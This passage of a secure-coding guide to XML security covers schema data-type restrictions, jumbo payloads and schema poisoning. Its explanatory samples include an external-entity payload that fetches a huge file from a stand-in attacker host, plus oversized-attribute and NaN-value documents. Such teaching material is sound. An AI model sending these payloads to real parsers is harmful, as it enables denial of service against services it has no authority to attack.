sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
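&lt;br /&gt;
For comparison, the following is a minimal sketch of how the same document could be constrained with XML Schema instead of DTD. The limits are illustrative assumptions, not recommendations: the maximum length of 256 for &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and the range of 0 to 150 for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; should be replaced with whatever the application actually expects:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- Assumed upper bound for a name, adjust as needed --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;!-- Zero or greater, with an assumed ceiling of 150 --&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With these facets in place, the one-million-digit value shown above would fail validation instead of reaching the application.&lt;br /&gt;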
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to unexpected situations. The result could be the disclosure of internal errors, or documents that reach the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and still considered it valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced, which suggests that the value was checked by application code rather than validated against the proposed sample schema.&lt;br /&gt;
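&lt;br /&gt;
Returning to the hexadecimal case mentioned at the start of this section, a dedicated data type could be sketched as follows. The element name &amp;lt;tt&amp;gt;checksum&amp;lt;/tt&amp;gt; and the length of 32 are hypothetical choices for illustration; &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; is the built-in XML Schema type for hex-encoded binary data, and its &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets rather than characters:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;checksum&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Hypothetical size: 32 octets, written as 64 hexadecimal characters --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;32&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;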
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, the calculation might yield a negative result on the user’s account if an attacker provides a negative number. To avoid this logical vulnerability, &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; should be declared as &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML Schema includes data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a data type that permits zero is used instead, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used for values that should only ever be real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, the price value cannot trigger errors by being set to Infinity or NaN, because these values are not valid and the document is rejected. If a schema allows those values, an attacker can exploit the issue.&lt;br /&gt;
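&lt;br /&gt;
For contrast, the following sketch shows the kind of declaration this section warns against, together with a document that would pass validation against it. The &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; structure is reused from the examples above; &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are the lexical forms that XML Schema accepts for the special values of &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!-- Illustrative only: float also admits INF, -INF and NaN --&amp;gt;&lt;br /&gt;
&amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:float&amp;quot;/&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;NaN&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
An application that multiplies this price by the quantity would end up with &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; as the total.&lt;br /&gt;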
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values must have one specific length (let's say 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
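The same idea applies to numeric values, where the facets &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; bound the value itself rather than its length. A minimal sketch, assuming a hypothetical &amp;lt;tt&amp;gt;percentage&amp;lt;/tt&amp;gt; element that must lie between 0 and 100:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;percentage&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Hypothetical bounds, both ends included --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;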
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. When you want to ensure that the data complies with that syntax, you can add a &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restriction to the XML schema. Social security numbers (SSN) serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, available in XML Schema 1.1, constrain the existence and values of related elements and attributes. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
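&lt;br /&gt;
A minimal sketch of the bounded alternative follows, assuming a hypothetical ceiling of 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements per &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;. The right number depends on what the application can process safely. Only the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration is shown; it would replace the one inside the sequence of the schema above:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!-- Hypothetical ceiling: at most 100 buy elements per operation --&amp;gt;&lt;br /&gt;
&amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;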
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot;LARGEVALUE&amp;quot; LARGENAME3=&amp;quot;LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
